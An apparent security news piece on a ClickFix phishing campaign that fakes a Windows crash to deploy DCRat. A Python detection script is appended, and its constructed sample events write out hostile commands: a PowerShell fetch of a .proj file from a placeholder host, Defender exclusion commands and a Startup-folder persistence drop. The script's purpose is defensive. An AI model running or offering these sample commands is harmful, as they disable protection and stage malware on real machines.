WhitepaperGlobal

ClickFix Campaign Mimics Windows Crash to Deploy Malware

Insights Desk, January 6, 2026 (updated January 7, 2026)

A highly sophisticated malware campaign, dubbed PHALTBLYX, has surfaced, leveraging social engineering tactics alongside advanced evasion methods to infiltrate organizations in the hospitality sector.

The campaign initiates with phishing emails masquerading as Booking.com notifications, warning recipients of urgent reservation cancellations and highlighting substantial charges in euros to create a sense of alarm.

These emails redirect victims to counterfeit Booking.com websites that closely mimic the legitimate platform’s design and functionality, capitalizing on user anxiety over potential financial fraud to drive engagement.

The attack proceeds through a carefully planned sequence of steps designed to bypass conventional security controls. Once victims click the refresh button on the fake page, a full-screen blue screen of death animation is rendered in their browser.

During this simulated crash, users are prompted to press keyboard combinations to follow the on-screen directions.

According to Securonix analysts, the page silently copies a PowerShell command to the clipboard, which victims unwittingly execute when they follow the presented instructions.

Securonix experts describe this ClickFix social engineering technique as a significant advancement in the attack’s delivery mechanism.

Because the user runs the command by hand rather than through an automated process, the technique sidesteps controls that would otherwise block script execution.

The malicious PowerShell command opens the genuine Booking.com admin page as a decoy while downloading an MSBuild project file from remote servers.

Using a “living off the land” technique, the infection chain runs the downloaded v.proj file through Microsoft’s legitimate MSBuild.exe compiler.

Proxying execution through trusted Windows utilities in this way lets the malware evade antivirus detection and application whitelisting.

Once running, the malware adds broad file-extension exclusions and specific directory exclusions to Windows Defender, effectively disabling it for the subsequent payloads so that they go unnoticed.

The final payload is a modified version of the DCRat remote access trojan, which is capable of extensive system compromise. The RAT establishes persistence by placing internet shortcut files in the Windows Startup folder, disguised as legitimate system programs.
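As an added example (not code from the article or from Securonix), the following Python runs detection logic for the four stages described above over a handful of constructed, simplified Sysmon-style process-creation and file-creation events; the file paths, event field names, placeholder URL and rule names are assumptions made for the illustration.

```python
import re

# Constructed Sysmon-style events (not real telemetry from the campaign); paths are illustrative.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -Command "Invoke-WebRequest http://placeholder.invalid/v.proj -OutFile $env:TEMP\\v.proj"'},
    {"type": "process", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\v.proj"},
    {"type": "process", "parent": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Add-MpPreference -ExclusionExtension .exe -ExclusionPath C:\Users\alice\AppData\Local\Temp"},
    {"type": "file", "image": r"C:\Users\alice\AppData\Local\Temp\svc.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.url"},
    {"type": "process", "parent": r"C:\VS\Common7\IDE\devenv.exe",  # benign developer build, must not alert
     "image": r"C:\VS\MSBuild\Current\Bin\MSBuild.exe", "cmdline": r"MSBuild.exe C:\src\app\app.csproj"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|Users\\Public|ProgramData)\\", re.I)
PROJ_FETCH = re.compile(r"(?:Invoke-WebRequest|iwr|DownloadFile|DownloadString|curl|wget)\b.*\.proj\b", re.I)
EXCLUSION = re.compile(r"Add-MpPreference\b.*-Exclusion(?:Path|Extension|Process)", re.I)
STARTUP_URL = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.url$", re.I)

def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev: dict) -> list:
    """Return the names of the rules an event trips (empty list = nothing suspicious)."""
    hits = []
    if ev["type"] == "process":
        img, parent, cmd = _base(ev["image"]), _base(ev.get("parent", "")), ev["cmdline"]
        if img in SCRIPT_HOSTS and PROJ_FETCH.search(cmd):  # stage 1: a script host fetches a .proj file
            hits.append("proj_download_by_script_host")
        if img == "msbuild.exe" and (parent in SCRIPT_HOSTS or USER_WRITABLE.search(cmd)):
            hits.append("msbuild_proxy_execution")  # stage 2: MSBuild spawned by a script host or building from a temp dir
        if EXCLUSION.search(cmd):  # stage 3: Defender exclusions added from the command line
            hits.append("defender_exclusion_added")
    elif ev["type"] == "file" and STARTUP_URL.search(ev["target"]):  # stage 4: .url dropped into Startup
        hits.append("startup_url_persistence")
    return hits

def scan(events) -> dict:
    """Map each rule name to the indices of the events that tripped it."""
    out = {}
    for i, ev in enumerate(events):
        for rule in classify(ev):
            out.setdefault(rule, []).append(i)
    return out

if __name__ == "__main__":
    for rule, idx in scan(SAMPLE_EVENTS).items():
        print(f"{rule}: event(s) {idx}")
```

The benign developer build in the last event trips no rule, which is the false-positive case any MSBuild-based detection must handle.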
